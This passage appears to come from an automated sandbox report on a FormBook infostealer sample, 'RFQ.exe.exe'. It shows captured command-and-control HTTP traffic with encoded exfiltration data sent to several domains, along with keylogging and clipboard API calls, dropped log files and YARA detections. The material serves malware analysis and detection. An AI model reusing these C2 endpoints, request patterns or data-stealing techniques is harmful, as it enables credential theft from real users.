55 52 46 6a 65 46 7a 5a 72 6b 7a 42 75 5f 38 44 42 42 71 61 55 58 38 42 49 70 51 73 73 58 51 62 51 6b 49 31 59 69 37 43 57 42 67 77 7e 72 44 72 62 5f 35 62 58 5f 38 56 52 51 4e 38 42 64 28 58 4f 66 43 46 61 61 35 66 58 77 4e 4a 37 65 6a 65 45 47 78 46 36 76 74 74 68 59 48 39 7a 59 28 73 61 68 59 41 73 78 4d 36 6b 33 4b 70 69 44 6c 71 4b 46 71 4f 72 55 77 4a 31 62 7e 6c 62 4d 69 67 74 6f 6b 33 55 50 34 34 45 70 33 6f 69 47 57 78 55 45 7e 69 30 44 54 58 53 31 30 65 51 43 42 5f 75 57 55 45 48 6f 36 5f 77 7a 63 77 77 6e 56 51 73 68 55 38 37 6d 61 41 72 5a 5a 47 54 66 73 4e 6a 70 4f 77 72 7a 42 6e 69 72 51 69 7e 6a 64 79 4a 79 53 6f 33 36 37 47 70 63 49 6d 72 31 56 50 38 72 75 48 30 32 76 6c 30 67 6f 62 47 42 62 34 64 4e 31 48 51 74 43 4a 76 70 54 58 61 61 68 79 36 50 78 64 68 33 77 6c 78 71 61 41 50 77 75 65 37 7a 72 4f 75 47 28 57 69 4f 6b 44 58 6d 56 2d 6a 36 41 4d 63 6c 33 6e 31 33 30 76 63 58 47 6d 6e 67 71 67 62 42 64 6e 54 70 77 65 6e 6e 42 50 70 50 6e 63 57 51 51 37 56 42 46 56 47 4e 32 75 4d 35 7a 52 75 66 55 6c 6
          Source: global trafficHTTP traffic detected: POST /m8l/ HTTP/1.1Host: www.tgers.comConnection: closeContent-Length: 409Cache-Control: no-cacheOrigin: http://www.tgers.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.tgers.com/m8l/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 74 56 54 3d 56 2d 4c 41 30 59 58 57 43 57 4f 46 62 6a 52 64 7e 74 30 39 57 4b 4f 45 51 33 69 58 64 74 6c 33 54 78 4c 35 54 5f 68 62 30 4b 4d 6a 50 74 35 59 50 6d 66 51 7a 59 4f 50 6a 58 39 6b 36 32 63 7a 44 42 41 6e 61 58 75 5f 41 6a 66 55 67 7a 42 5a 52 73 47 71 30 52 6f 30 63 47 4f 4c 4e 64 45 41 6f 74 33 34 61 33 49 2d 49 54 50 52 4f 74 4b 4a 6d 39 6b 30 6a 66 32 38 4d 71 51 51 70 54 50 74 79 50 7a 75 36 4f 6d 7a 6b 6c 6c 50 75 37 4a 38 54 6b 33 76 56 37 70 37 62 70 68 4c 67 48 68 65 51 4f 45 42 7a 54 38 67 57 4d 67 76 4e 41 72 57 28 72 31 34 47 37 42 52 54 57 6a 52 5a 69 47 51 6b 39 6e 48 45 59 7a 59 6a 64 66 56 42 43 7a 73 6a 61 72 33 66 74 65 30 6e 59 61 47 6c 65 4e 65 62 4c 55 38 79 58 69 39 77 43 38 76 73 67 69 51 78 66 5a 41 4a 48 61 66 45 36 52 2d 50 52 53 72 6f 48 4a 41 47 39 75 52 39 4e 5a 55 75 44 33 53 34 33 54 68 37 55 58 5a 74 56 34 6e 42 49 72 79 35 32 46 49 55 62 7e 38 46 73 4f 55 64 59 57 78 7a 2d 53 30 4a 34 73 49 6a 66 50 61 47 72 41 74 4a 47 62 58 73 79 4e 6d 65 53 73 45 74 38 68 5f 34 4b 4d 4f 34 61 78 63 54 33 45 36 43 74 6d 32 32 35 32 32 71 78 7a 38 71 44 58 76 50 45 69 39 4a 6a 30 79 6d 52 79 61 42 38 6e 70 78 31 33 73 50 54 39 6d 38 35 4f 53 76 75 48 77 62 69 6e 6e 65 77 29 2e 00 51 4e 69 5a 75 77 29 Data Ascii: 
tVT=V-LA0YXWCWOFbjRd~t09WKOEQ3iXdtl3TxL5T_hb0KMjPt5YPmfQzYOPjX9k62czDBAnaXu_AjfUgzBZRsGq0Ro0cGOLNdEAot34a3I-ITPROtKJm9k0jf28MqQQpTPtyPzu6OmzkllPu7J8Tk3vV7p7bphLgHheQOEBzT8gWMgvNArW(r14G7BRTWjRZiGQk9nHEYzYjdfVBCzsjar3fte0nYaGleNebLU8yXi9wC8vsgiQxfZAJHafE6R-PRSroHJAG9uR9NZUuD3S43Th7UXZtV4nBIry52FIUb~8FsOUdYWxz-S0J4sIjfPaGrAtJGbXsyNmeSsEt8h_4KMO4axcT3E6Ctm22522qxz8qDXvPEi9Jj0ymRyaB8npx13sPT9m85OSvuHwbinnew).QNiZuw)
          Source: global trafficHTTP traffic detected: POST /m8l/ HTTP/1.1Host: www.tgers.comConnection: closeContent-Length: 142745Cache-Control: no-cacheOrigin: http://www.tgers.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.tgers.com/m8l/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 74 56 54 3d 56 2d 4c 41 30 62 48 61 44 6e 66 64 66 51 34 71 32 2d 5a 76 66 36 47 4b 53 47 57 51 44 4e 64 4a 65 47 61 6b 54 5f 52 66 68 5f 51 58 63 65 78 59 4a 6b 33 58 37 59 4f 49 6c 58 39 6c 7e 32 41 4c 4d 41 6b 76 61 56 43 52 41 6c 48 4c 79 77 70 57 52 38 47 39 30 77 55 45 61 43 6d 51 4e 62 4e 51 72 50 62 65 66 33 30 2d 47 48 62 54 42 70 50 56 6a 5f 41 72 74 50 36 35 4b 75 55 4a 70 68 37 5f 77 76 71 42 72 4c 47 78 31 44 4e 59 69 62 34 72 58 33 58 6b 4c 37 74 32 43 61 63 50 71 41 51 58 44 36 51 6e 71 78 55 6e 55 38 35 73 49 43 7a 6b 76 4a 5a 42 56 36 52 46 54 56 54 72 55 78 43 37 31 73 37 66 47 70 76 2d 6f 49 28 58 66 46 76 4f 6f 35 4f 46 5a 74 4f 62 36 6f 71 6a 32 65 68 48 61 4a 38 57 38 57 36 57 79 33 55 64 6e 77 54 77 77 35 55 44 4c 48 71 67 63 74 46 74 46 6c 75 6a 72 42 52 36 43 64 75 71 37 4e 5a 69 36 32 37 44 39 54 33 55 34 45 6d 34 6e 30 78 7a 4e 38 62 39 38 30 42 36 65 61 71 35 47 64 6d 49 56 4c 75 6a 35 5f 47 5f 49 62 78 6a 36 76 4f 62 4d 4e 39 41 4a 47 62 31 73 33 31 59 65 6a 34 45 73 6f 30 6b 34 6f 6b 38 76 4b 78 42 51 6d 30 34 4a 2d 43 6d 32 35 4f 32 72 45 50 47 72 77 48 76 59 42 75 2d 4a 43 30 79 6e 42 79 61 49 63 6d 78 32 31 75 54 4e 57 70 5f 34 62 72 48 73 72 36 58 4e 47 79 62 47 6e 4a 55 7e 76 32 35 47 59 4b 72 59 51 71 57 58 5f 36 4d 72 7a 41 4a 28 4b 6e 41 54 69 65 76 67 5f 6c 4c 42 63 4f 58 47 31 4d 43 62 39 42 58 61 67 47 55 48 35 35 79 61 4a 6f 34 38 6b 34 71 38 70 6d 67 43 58 28 73 46 57 63 5f 34 71 61 32 38 71 53 37 62 2d 6c 35 28 57 41 68 72 66 4d 2d 4b 65 67 4c 74 64 6d 70 76 74 56 4d 43 46 7e 75 68 78 6b 5f 6a 68 50 71 34 
69 75 51 62 4a 66 36 7e 49 31 64 70 6c 61 67 6d 56 52 53 46 39 59 59 6c 39 31 78 61 43 52 62 76 70 53 61 7a 72 74 30 37 5a 66 54 50 42 32 62 72 70 46 6f 39 6e 54 56 54 33 72 6f 6e 45 63 38 44 76 36 41 7e 73 78 4b 55 76 79 43 61 77 6f 34 4c 42 63 73 6b 6b 6a 37 68 58 71 31 57 33 4c 6c 72 49 6e 35 71 58 71 51 50 69 79 4f 73 52 64 2d 48 67 54 6c 37 5a 75 41 54 48 5a 31 52 61 68 6c 52 77 4b 41 59 72 68 76 7e 66 6e 49 37 64 79 48 79 37 4f 50 34 50 4f 67 30 43 38 43 56 37 65 6e 5a 6b 6a 30 39 37 33 63 6a 41 44 77 49 79 35 45 4c 6c 61 39 28 47 76 6c 30 4e 32 6f 72 43 7e 52 59 7a 4e 69 47 6c 72 33 38 43 54 47 78 6d 78 53 32 2d 76 64 64 51 78 48 73 7a 79 53 7a 72 51 6b 55 4a 7a 36 58 44 35 67 7a 4e 45 6e 4f 2d 44 4b 62 4e 68 66 30 70 58 57 75 4e 51 6f 49 38 70 33 59 76 67 65 76 74 78 79 38 68 76 57 36 74 65 6d 4a 52 67 54 47 43 51 68 6b 4e 48 4f 70 6d 4e 45 49 61 73 58 66 4f 68 77 7a 63 4a 6e 68 67 54 32 6a 73 6a 35 5a 5a 6c 39 61 48 31 5a 74 47 6d 36 61 31 46 58 35 4f 6f 61 71 30 31 6f 33 2d 35 76 71 48 76 6f 35 72 69 65 64 5
          Source: C:\Users\user\Desktop\RFQ.exe.exeCode function: 6_2_00E44EB5 InternetReadFile,InternetQueryDataAvailable,InternetReadFile,6_2_00E44EB5
          Source: global trafficHTTP traffic detected: GET /m8l/?tVT=stAPCawU9FsBsDeLDlqawFgIxU41y6VpxlOSmtpgZq2QqlgInUNCOlYAlNLBb+BUECvq&MR-p=0tPLH85x-lH HTTP/1.1Host: www.kmwhbl.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /m8l/?tVT=lki1ed3GPMN5Nw1jaHFlS3B9RQB9zvXEK7YHw36ZfVLkkOoQWGs0VMlLDODNdBIBI6zD&MR-p=0tPLH85x-lH HTTP/1.1Host: www.addis.techConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /m8l/?MR-p=0tPLH85x-lH&tVT=ovbFtOa4uTjd1a92oYI1beIGZw7s4qusWsZU0rgv2nLP+ugoFD+dLAFKen/jDfcukVqZ HTTP/1.1Host: www.nusaliterainspirasi.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /m8l/?MR-p=0tPLH85x-lH&tVT=PZkH6llHoqFvvgYvV7p0jyJ4zE2wugCWkpTMu12MC83jrlv2PlfP15O4FxttxOVUzuUw HTTP/1.1Host: www.teccommunications.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /m8l/?tVT=HCt+Yhx/h4l+FCj3nKRKOvS7Xa1e0tc/Egfr+bgHKkeQjLAOt82B/JBt+eO2F9D4/3gd&MR-p=0tPLH85x-lH HTTP/1.1Host: www.obsoletelabs.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /m8l/?tVT=5W/5kEIdtxVt3n/xoeTRd2P1yDG4A43nFAD006cGMUhROXoTda6GZj7hA5S0bqxvW5XG&MR-p=0tPLH85x-lH HTTP/1.1Host: www.artiyonq.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /m8l/?MR-p=0tPLH85x-lH&tVT=dcH6q++BfneLHwYr+7wkAtOqeHmKUMZpIhb6VvBnwf4Bd/1QFFGV2dHI+mdn934ofCRD HTTP/1.1Host: www.tgers.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /m8l/?tVT=stAPCawU9FsBsDeLDlqawFgIxU41y6VpxlOSmtpgZq2QqlgInUNCOlYAlNLBb+BUECvq&MR-p=0tPLH85x-lH HTTP/1.1Host: www.kmwhbl.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /m8l/?MR-p=0tPLH85x-lH&tVT=ovbFtOa4uTjd1a92oYI1beIGZw7s4qusWsZU0rgv2nLP+ugoFD+dLAFKen/jDfcukVqZ HTTP/1.1Host: www.nusaliterainspirasi.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: unknownDNS traffic detected: queries for: cdn.onenote.net
          Source: unknownHTTP traffic detected: POST /m8l/ HTTP/1.1Host: www.addis.techConnection: closeContent-Length: 409Cache-Control: no-cacheOrigin: http://www.addis.techUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.addis.tech/m8l/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 74 56 54 3d 74 47 75 50 41 39 53 76 64 6f 49 51 66 53 51 4e 65 52 6f 6b 4c 51 35 54 46 41 6c 4f 6b 64 66 5a 62 75 30 44 6b 6e 7e 77 50 48 76 35 68 66 31 4b 53 6b 64 77 64 63 74 50 42 59 47 63 5a 68 34 7a 4a 59 69 34 73 54 4f 54 45 36 36 56 4a 66 53 66 74 7a 43 36 4e 56 37 6d 61 4a 79 73 70 30 46 56 51 31 42 62 47 61 48 4e 4e 6f 6f 41 4f 62 30 6d 54 31 52 5a 45 35 75 74 4b 7a 78 68 50 71 52 35 65 54 43 57 53 7a 49 6c 4c 69 7a 59 6f 72 28 62 4e 55 54 6d 6b 70 44 5a 79 61 7a 53 68 48 50 48 62 74 7e 5a 79 2d 4b 48 65 47 61 6d 38 45 64 2d 68 57 63 6a 6e 31 62 74 50 6e 63 4b 45 4e 67 6c 72 6a 67 46 4f 2d 43 52 4f 52 62 32 6f 53 44 45 71 36 62 58 48 37 76 33 49 4a 6f 74 52 57 73 71 4f 51 28 67 67 52 59 4f 54 49 56 77 6a 6e 7a 57 6e 4a 7e 72 42 61 44 76 70 70 76 5a 70 76 32 37 71 56 6c 79 56 7a 6c 34 36 4f 44 59 7a 66 55 44 65 79 49 6c 69 2d 30 73 74 78 49 4c 59 30 70 5a 4b 4c 48 55 4b 53 6c 6b 54 39 35 39 73 4f 43 45 38 56 53 6f 47 46 51 4e 5a 45 71 38 49 42 6d 4d 78 61 73 76 54 45 6f 6e 62 6a 41 52 51 44 63 44 53 77 36 50 31 6a 75 7a 39 43 73 35 73 76 28 50 31 79 72 64 45 44 39 62 6c 72 78 53 44 30 61 4f 6b 54 4d 4f 58 65 77 36 61 36 42 41 34 4d 36 38 43 34 34 4c 54 4a 43 39 63 36 37 64 43 6a 6e 57 37 67 29 2e 00 00 00 00 00 00 00 00 Data Ascii: 
tVT=tGuPA9SvdoIQfSQNeRokLQ5TFAlOkdfZbu0Dkn~wPHv5hf1KSkdwdctPBYGcZh4zJYi4sTOTE66VJfSftzC6NV7maJysp0FVQ1BbGaHNNooAOb0mT1RZE5utKzxhPqR5eTCWSzIlLizYor(bNUTmkpDZyazShHPHbt~Zy-KHeGam8Ed-hWcjn1btPncKENglrjgFO-CRORb2oSDEq6bXH7v3IJotRWsqOQ(ggRYOTIVwjnzWnJ~rBaDvppvZpv27qVlyVzl46ODYzfUDeyIli-0stxILY0pZKLHUKSlkT959sOCE8VSoGFQNZEq8IBmMxasvTEonbjARQDcDSw6P1juz9Cs5sv(P1yrdED9blrxSD0aOkTMOXew6a6BA4M68C44LTJC9c67dCjnW7g).
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closeX-Powered-By: PHP/7.0.33Content-Type: text/html; charset=UTF-8Expires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <http://nusaliterainspirasi.com/wp-json/>; rel="https://api.w.org/"Transfer-Encoding: chunkedContent-Encoding: gzipVary: Accept-EncodingDate: Wed, 24 Jun 2020 01:54:03 GMTServer: LiteSpeedData Raw: 63 65 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cc 5a 6d 6f db 38 12 fe 6c 03 f7 1f 14 16 4d 2c 54 6f b6 93 d8 71 2c 17 6d da de ed 6d bb ed b5 dd 3b 1c 36 c5 62 2c d1 32 6d 8a d4 92 b4 9d 5c 9a ff 7e 20 25 45 b2 f3 e6 74 0d dc e5 43 c4 d7 e1 33 c3 99 e1 70 e8 e1 de 9b 8f 67 5f ff fd e9 ad 35 55 29 1d 35 87 fa 63 51 60 49 88 30 43 a3 66 73 38 c5 10 8f 9a 8d 61 8a 15 58 d1 14 84 c4 2a 44 bf 7e 7d e7 f6 91 e5 df f4 30 48 71 88 96 04 af 32 2e 14 b2 22 ce 14 66 2a 44 2b 12 ab 69 18 e3 25 89 b0 6b 2a 8e 45 18 51 04 a8 2b 23 a0 38 6c eb 75 1a 43 4a d8 dc 12 98 86 28 13 7c 42 28 46 d6 54 e0 49 88 a6 4a 65 03 df 4f d2 2c f1 b8 48 fc 8b 09 f3 db ed 62 f1 da 2c c2 92 31 44 f3 8d 69 6c 21 81 12 85 05 10 26 33 22 40 12 2f e2 a9 7f 91 52 91 45 5e 36 cd 0c a5 66 63 a8 88 a2 78 f4 09 12 6c 31 ae ac 09 5f b0 78 e8 e7 ad cd 0a de 41 cc a4 9b 09 3c c1 2a 9a 1e e4 18 0f 7c ff 9e 75 0e b4 8c 1e 9d 2c 03 6f 95 69 58 5b 0e f7 12 01 4b 50 20 b6 9f 33 e1 4c 49 2f e1 3c a1 18 32 22 b7 9f 29 bd 95 96 fb 06 34 04 54 61 c1 40 61 64 a9 cb 0c 87 08 b2 8c 92 08 14 e1 cc 17 52 be b8 48 29 b2 8c f8 42 64 ed 0b f8 63 c1 4f ad 77 18 c7 5b ee d0 04 e3 d8 37 9b 53 c9 ef 07 57 3d e3 69 8a 99 92 4f 59 3e 2a e6 f8 15 8e 46 63 28 23 41 32 55 70 ac f0 85 f2 67 b0 84 bc 15 8d 9a 8d 46 63 45 58 cc 57 de ef ab 0c a7 7c 46 be 60 a5 08 4b a4 15 5a 57 68 0c 12 ff 2a 28 1a 18 a5 96 83 73 ff dc 2f c4 7b ee 93 14 12 2c cf fd 88 0b 7c ee 9b c9 e7 7e bb ed 75 bc e0 dc ef 75 2e 7a 9d 73 1f 39 08 5f 28 34 40 5e c6 12 e4 20 b9 4c 7e 8c 9e 5c 26 86 9a 5c 26 6f 73 82 72 69 08 f2 85 88 
30 1a 5c a1 88 b3 08 94 81 51 e0 35 70 ef d1 f3 73 7f 95 b9 84 45 74 11 6b 1e 66 d2 34 98 d9 ae c0 14 83 c4 5e 4a 98 37 93 e8 fa fa 54 cb 69 6f b2 60 91 56 96 16 38 63 27 b2 af ca ba 15 eb 16 fb 6a 09 c2 8a c2 2f 4a 10 96 78 13 c1 d3 b3 29 88 33 1e e3 53 ea 45 14 83 f8 8c 23 d5 0a 9c c0 99 7b b9 63 99 7b 53 4c 92 a9 b2 1d ea 4d 08 a5 5f f1 85 6a 45 9e 56 cc cb 96 9a 12 e9 80 ed 04 4e 60 9f 6a da 71 38 f7 14 7f 03 0a 7e fd fc be 65 ff 09 aa e3 1a 55 bc 41 55 60 b5 10 cc 8a c3 30 c4 d7 37 2c e2 16 e4 0c 8e 4f c9 a4 b5 47 bf 7f df ab 20 db f9 9c bd f6 a9 5c 11 15 4d 5b d4 d3 9a f6 1a 24 a6 84 e1 10 29 9e 21 cd 22 d7 0e f6 38 08 ac 6e 27 bb b0 5e 09 02 14 39 60 5f 45 20 31 9a 50 48 d0 a0 20 d5 1a 87 71 eb b7 a3 a3 ee d1 b1 73 74 dc ef 1c 3b 37 e5 f6 c9 37 67 ad a7 df 09 ba 6b dd b6 bd bf bf 46 a0 d7 ed 76 9c a3 e3 76 a7 ef 1c 1d 1f 76 ba 55 b9 ad 5b ca f6 76 55 ee 06 55 b9 3e fe b0 57 2d 6e a8 e6 8b df 90 e8 3a eb 0d ed fe 46 43 a7 bd d1 d0 0d 36 1a 3a 9b 34 0e 7b df 6c 67 6f 6c 9f 1a 31 15 0a 5e 6c d3 8d 98 34 1f bd e3
          Source: explorer.exe, 00000009.00000000.861192307.0000000010256000.00000002.00000001.sdmpString found in binary or memory: http://fontfabrik.com
          Source: explorer.exe, 00000009.00000000.831639365.0000000000CF0000.00000002.00000001.sdmpString found in binary or memory: http://www.%s.comPA
          Source: explorer.exe, 00000009.00000000.861192307.0000000010256000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
          Source: explorer.exe, 00000009.00000000.861192307.0000000010256000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
          Source: explorer.exe, 00000009.00000000.861192307.0000000010256000.00000002.00000001.sdmpString found in binary or memory: http://www.fonts.com
          Source: explorer.exe, 00000009.00000000.861192307.0000000010256000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
          Source: explorer.exe, 00000009.00000000.861192307.0000000010256000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
          Source: explorer.exe, 00000009.00000000.861192307.0000000010256000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
          Source: explorer.exe, 00000009.00000000.861192307.0000000010256000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
          Source: explorer.exe, 00000009.00000000.861192307.0000000010256000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
          Source: explorer.exe, 00000009.00000000.861192307.0000000010256000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
          Source: explorer.exe, 00000009.00000000.861192307.0000000010256000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
          Source: explorer.exe, 00000009.00000000.861192307.0000000010256000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
          Source: explorer.exe, 00000009.00000000.861192307.0000000010256000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
          Source: explorer.exe, 00000009.00000000.861192307.0000000010256000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
          Source: explorer.exe, 00000009.00000000.861192307.0000000010256000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn

          Source: C:\Users\user\Desktop\RFQ.exe.exeCode function: 6_2_00E46B0C OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,6_2_00E46B0C
          Source: C:\Users\user\Desktop\RFQ.exe.exeCode function: 6_2_00E32B37 GetKeyboardState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,6_2_00E32B37
          Source: C:\Users\user\Desktop\RFQ.exe.exeCode function: 6_2_00E5F7FF DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,6_2_00E5F7FF

          E-Banking Fraud:

          Yara detected FormBook
          Source: Yara matchFile source: 0000001E.00000002.1280450173.0000000002550000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000001D.00000002.1277991458.0000000000DD0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000001D.00000002.1278238054.0000000001400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.881220627.00000000007D0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.882704990.0000000000D50000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000001D.00000002.1277745187.0000000000401000.00000020.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.880507060.0000000000401000.00000020.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 29.2.ebplgh1bmx.exe.400000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 8.2.RFQ.exe.exe.400000.0.unpack, type: UNPACKEDPE

          System Summary:

          Detected FormBook malware
          Source: C:\Windows\SysWOW64\cmd.exeDropped file: C:\Users\user\AppData\Roaming\8-LP7Q9T\8-Llogri.ini
          Source: C:\Windows\SysWOW64\cmd.exeDropped file: C:\Users\user\AppData\Roaming\8-LP7Q9T\8-Llogrf.ini
          Source: C:\Windows\SysWOW64\cmd.exeDropped file: C:\Users\user\AppData\Roaming\8-LP7Q9T\8-Llogrv.ini
          Malicious sample detected (through community Yara rule)
          Source: 0000001E.00000002.1280450173.0000000002550000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000001E.00000002.1280450173.0000000002550000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000001D.00000002.1277991458.0000000000DD0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000001D.00000002.1277991458.0000000000DD0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000001D.00000002.1278238054.0000000001400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000001D.00000002.1278238054.0000000001400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000008.00000002.881220627.00000000007D0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000008.00000002.881220627.00000000007D0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000008.00000002.882704990.0000000000D50000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000008.00000002.882704990.0000000000D50000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000001D.00000002.1277745187.0000000000401000.00000020.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000001D.00000002.1277745187.0000000000401000.00000020.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000008.00000002.880507060.0000000000401000.00000020.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000008.00000002.880507060.0000000000401000.00000020.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 29.2.ebplgh1bmx.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 29.2.ebplgh1bmx.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 8.2.RFQ.exe.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 8.2.RFQ.exe.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Binary is likely a compiled AutoIt script file
          Source: RFQ.exe.exe, 00000000.00000000.762180934.0000000000E9E000.00000002.00020000.sdmp | String found in binary or memory: This is a third-party compiled AutoIt script.
          Source: RFQ.exe.exe, 00000000.00000000.762180934.0000000000E9E000.00000002.00020000.sdmp | String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer
          Source: C:\Users\user\Desktop\RFQ.exe.exe | Code function: This is a third-party compiled AutoIt script. | 6_2_00DF3D19
          Source: RFQ.exe.exe | String found in binary or memory: This is a third-party compiled AutoIt script.
